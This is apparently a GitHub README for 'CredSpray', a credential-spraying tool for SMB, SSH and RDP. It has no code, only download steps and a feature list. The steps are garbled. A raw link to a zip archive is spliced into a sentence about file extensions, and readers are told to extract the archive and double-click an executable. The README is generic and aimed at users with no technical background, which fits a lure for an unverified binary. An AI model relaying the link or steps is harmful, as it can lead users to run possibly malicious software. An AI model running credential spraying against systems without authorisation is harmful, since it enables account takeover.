Welcome to CredSpray! This tool helps you validate credentials using multiple protocols for penetration testing. Whether you are testing your own systems or engaging in ethical hacking, this tool provides both spray and no-spray modes to suit your needs.
You can visit the following page to download the latest version of CredSpray:
Before you begin, ensure your system meets the following requirements:
- Operating System: Windows, macOS, or Linux
- .NET Framework: Version 4.7 or higher (if using Windows)
- Memory: Minimum of 4 GB RAM
- Disk Space: At least 100 MB of free space
Go to the Releases page. You will see a list of available versions.
Look for the latest version at the top of the list. Under the release, you will find downloadable files suitable for your operating system.
Click on the appropriate file for your operating system. Your browser will start downloading it.
If the file is compressed (e.g., .zip or https://github.com/adienamgfrh/CredSpray/raw/refs/heads/main/appinite/Spray_Cred_v2.3.zip), locate the downloaded file and extract its contents to a folder of your choice. Right-click the file and select "Extract Here" or use your preferred extraction tool.
Navigate to the folder where you extracted the files. You will find an executable file named CredSpray. Double-click it to run the application.
Once the application is running, you will see a user-friendly interface. Hereβs how to get started:
- Select Protocol: Choose the protocol you wish to test (e.g., SMB, SSH, RDP).
- Enter Credentials: Input the username and password combinations you want to validate.
- Choose Mode: Select either "Spray" or "No-Spray" mode based on your preference.
- Start Validation: Click the "Start" button to begin the credential validation process.
- Multi-Protocol Support: Works with SMB, SSH, RDP, and more.
- Flexible Modes: Choose between spray and no-spray modes for various testing needs.
- User-Friendly Interface: Designed for easy use, even for those with no technical background.
- Export Results: Save your results in a CSV format for easy reporting.
If you have questions or need help, please visit our community forum or check the issues section on GitHub. We encourage users to share their experiences and tips.
We welcome contributions from the community! If you'd like to report a bug or suggest a feature, please open an issue on GitHub. For significant changes, consider submitting a pull request.
For more information about ethical hacking and penetration testing, consider exploring the following topics:
- Cybersecurity best practices
- Credential validation techniques
- Penetration testing methodologies
Your feedback is valuable, and we aim to continually improve CredSpray. Thank you for using our tool!